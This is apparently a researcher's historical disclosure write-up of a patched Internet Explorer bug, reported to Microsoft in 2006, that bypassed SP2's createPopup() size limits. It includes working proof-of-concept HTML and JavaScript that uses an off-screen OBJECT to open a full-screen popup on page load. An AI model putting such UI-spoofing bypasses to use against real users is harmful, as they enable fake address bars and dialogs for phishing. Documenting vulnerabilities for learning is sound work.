When SP2 shipped, Microsoft added size restrictions to createPopup() — the popup window could no longer extend beyond the browser’s own boundaries. It was a reasonable fix for a technique that was being used to fake browser chrome and cover the address bar. I called this one “No Big Deal” when I reported it, because on its own it does not enable much harm. But it is a clean bypass of the new restriction, and bypasses are worth documenting.
How It Works
The same <OBJECT TYPE="text/html"> trick from the main UXSS post also gives you a parentWindow reference that lives outside the browser’s normal frame hierarchy. When you call createPopup() from that window, the size restrictions that SP2 introduced do not apply — you can show a popup of any size, including one that covers the full screen.
The Code
<HTML>
<BODY>
<OBJECT ID="browserLimits"
STYLE="position:absolute;top:-1000px;left:-1000px;"
WIDTH=3000 HEIGHT=3000
DATA="favicon.ico"
TYPE="text/html">
</OBJECT>
<SCRIPT LANGUAGE="JavaScript">
function noBrowserLimits() {
// Get the window reference outside the browser's normal hierarchy.
var oLimit = document.all.browserLimits.object.parentWindow;
// createPopup from there — no size restrictions.
var blueScreen = oLimit.createPopup();
blueScreen.document.bgColor = "BLUE";
blueScreen.show(0, 0, 2000, 2000); // covers the full screen
}
window.onload = noBrowserLimits;
</SCRIPT>
</BODY>
</HTML>The OBJECT is positioned off-screen so the user does not see it. Its parentWindow is where the magic happens — from that reference, createPopup() behaves as if SP2’s restrictions were never there.
MSRC assigned this as case 6435. As I said at the time: it is not a catastrophic issue on its own, but combined with other techniques it could be used to convincingly spoof UI elements like the address bar or fake browser dialogs.
Reported to MSRC in 2006. This was one was patched long ago — Shared here as a historical record for learning purposes.